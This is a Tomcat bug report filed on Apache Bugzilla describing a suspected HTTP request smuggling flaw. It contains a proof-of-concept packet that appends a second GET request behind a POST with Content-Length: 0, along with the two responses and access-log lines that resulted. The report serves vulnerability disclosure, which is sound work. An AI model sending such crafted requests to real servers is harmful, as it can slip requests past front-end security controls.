https://bz.apache.org/bugzilla/show_bug.cgi?id=67300
Bug ID: 67300
Summary: Suspected HTTP request smuggling vulnerability
Product: Tomcat 9
Version: 9.0.75
Hardware: PC
OS: Linux
Status: NEW
Severity: normal
Priority: P2
Component: Catalina
Assignee: dev@tomcat.apache.org
Reporter: digital...@huawei.com
Target Milestone: -----
It is suspected that an HTTP request smuggling vulnerability exists. An
attacker can construct another request in the message body to achieve the
attack effect.
Construct the following packet. Because Content-Length: 0, the messages after
line 19 are processed as the second request.
The Wireshark tool is used to capture tcpdump. It is found that the sender
sends only one packet, but Tomcat responds twice. In addition, two records are
recorded in the localhost_access log.
eg
===============================================================================
POST / HTTP/1.1
Host: XXXXXXXX:8443
Cookie: sessionId=7E0E45CDE615B204BD8426EA280ED3FDDFDF3822CEF1EB41
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://135.191.162.133:8443/html/common/main.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
GET / HTTP/1.1
Host: XXXXXXXX:8443
Cookie: sessionId=7E0E45CDE615B204BD8426EA280ED3FDDFDF3822CEF1EB41
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://135.191.162.133:8443/html/common/main.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
=====================================================================
response
HTTP/1.1 403
Set-Cookie: sessionId=FB4EBCD594EE7940D6603A976874DBA63A862B26438057BC; Path=/;
Secure; HttpOnly; SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=3153600;includeSubDomains
Referrer-Policy: same-origin
Content-Type: text/html;charset=UTF-8
Content-Length: 18
Date: Thu, 07 Sep 2023 23:15:10 GMT
Keep-Alive: timeout=20
Connection: keep-alive
InValid CSRF TokenHTTP/1.1 200
Set-Cookie: sessionId=C4DE25F4A422816F6C444CD3F447D91382A1921BBA8A3FE0; Path=/;
Secure; HttpOnly; SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=3153600;includeSubDomains
Referrer-Policy: same-origin
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Thu, 07 Sep 2023 23:15:10 GMT
Connection: close
=====================================================================
log in localhost_access.log
[07/Sep/2023:23:15:10 +0000]^180.59.110.8^-^POST / HTTP/1.1^Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/105.0.5195.102
Safari/537.36^https://XXXXXXXX:8443/html/common/main.jsp^-^application/x-www-form-urlencoded^zh-CN,zh;q=0.9^text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9^gzip,
deflate^403^18^0.003^
[07/Sep/2023:23:15:10 +0000]^180.59.110.8^-^GET / HTTP/1.1^Mozilla/5.0 (Windows
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/105.0.5195.102
Safari/537.36^https://XXXXXXXX:8443/html/common/main.jsp^-^-^zh-CN,zh;q=0.9^text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9^gzip,
deflate^200^33142^0.011^
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
